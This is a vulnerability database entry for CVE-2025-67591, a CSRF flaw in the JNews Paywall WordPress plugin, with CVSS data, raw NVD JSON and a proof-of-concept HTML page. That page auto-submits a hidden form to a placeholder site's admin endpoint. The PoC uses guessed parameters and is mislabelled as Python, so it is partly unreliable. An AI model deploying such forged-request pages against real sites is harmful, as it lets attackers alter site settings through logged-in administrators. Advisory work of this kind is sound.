Security Vulnerability Report
中文
CVE-2025-67591 CVSS 4.3 MEDIUM

CVE-2025-67591

Published: 2025-12-09 16:18:37
Last Modified: 2026-04-27 18:16:45

Description

Cross-Site Request Forgery (CSRF) vulnerability in jegtheme JNews Paywall jnews-paywall allows Cross Site Request Forgery.This issue affects JNews Paywall: from n/a through < 12.0.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

JNews Paywall < 12.0.1
jnews-paywall 所有12.0.1之前的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67591: JNews Paywall CSRF Vulnerability --> <!-- This PoC demonstrates how an attacker can trick an authenticated admin into submitting a malicious request --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-67591</title> </head> <body> <h1>CSRF PoC for JNews Paywall < 12.0.1</h1> <p>This page demonstrates the CSRF vulnerability in JNews Paywall plugin.</p> <!-- Auto-submit form targeting the vulnerable endpoint --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Replace with actual vulnerable parameters based on JNews Paywall functionality --> <input type="hidden" name="action" value="jnews_paywall_settings"> <input type="hidden" name="paywall_option" value="malicious_value"> <input type="hidden" name="submit" value="Save"> <!-- CSRF token missing - this is the vulnerability --> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the request has been submitted.</p> </body> </html> <!-- Mitigation: Add CSRF token verification in the plugin code --> <!-- Example fix in PHP: if (!wp_verify_nonce($_POST['csrf_token'], 'jnews_paywall_nonce')) { wp_die('CSRF token validation failed'); } -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67591", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:37.207", "lastModified": "2026-04-27T18:16:45.390", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in jegtheme JNews Paywall jnews-paywall allows Cross Site Request Forgery.This issue affects JNews Paywall: from n/a through < 12.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jnews-paywall/vulnerability/wordpress-jnews-paywall-plugin-12-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}